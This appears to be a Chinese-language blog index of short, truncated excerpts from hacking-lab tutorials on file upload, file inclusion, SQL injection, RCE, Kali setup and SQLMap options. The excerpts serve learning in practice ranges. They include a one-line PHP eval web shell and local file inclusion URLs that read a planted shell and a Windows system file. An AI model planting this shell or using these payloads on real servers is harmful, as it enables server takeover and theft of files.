webshell webshell管理工具 Upload-labs靶场实战 方法不唯一 WebShell 的内容部分都是: 1 <?php @eval($_POST["Lyrio"]);phpinfo();?> phpinfo()用来方便判断 WebShell 是否被执行 靶场的 php
文件包含漏洞 本地文件包含 1 http://localhost/fileinc/include.php?file=webshell.php 1 http://localhost/fileinc/include.php?file=C:\Windows\system.ini 远程文件包含 1 http://localhost/fileinc/include.php?file=http
Sqli-labs靶场实战 源码做了修改,有的关卡把sql语句打印出来方便学习: echo $sql."</br>";,
SQL注入—联合注入 概述:所谓的SQL注入就是通过某种方式将恶意的SQL代码添加到输入参数中,然后传递到SQL服务器使其解析并执行的一种攻击
Kali基本配置 虚拟机的复制/粘贴的快捷键是:Ctrl+shift+C / Ctrl+shift+V 激活 root 权限 1 sudo passwd root 系统会先让输入密码(开机时的密码kali) 再设
RCE漏洞 概述:由于程序中预留了执行代码或者命令的接口,并 且提供了给用户使用的界面,导致被黑客利用,控制服务器。 RCE漏洞危害1、获取服务
SQLMap 使用 常见参数 数据猜解-库表列数据&字典 1 2 3 4 5 6 7 --current-db //查询当前库名 -D "" --tables //查询某库下的表名 -D "" -T "" --columns //查询某库下的某表下的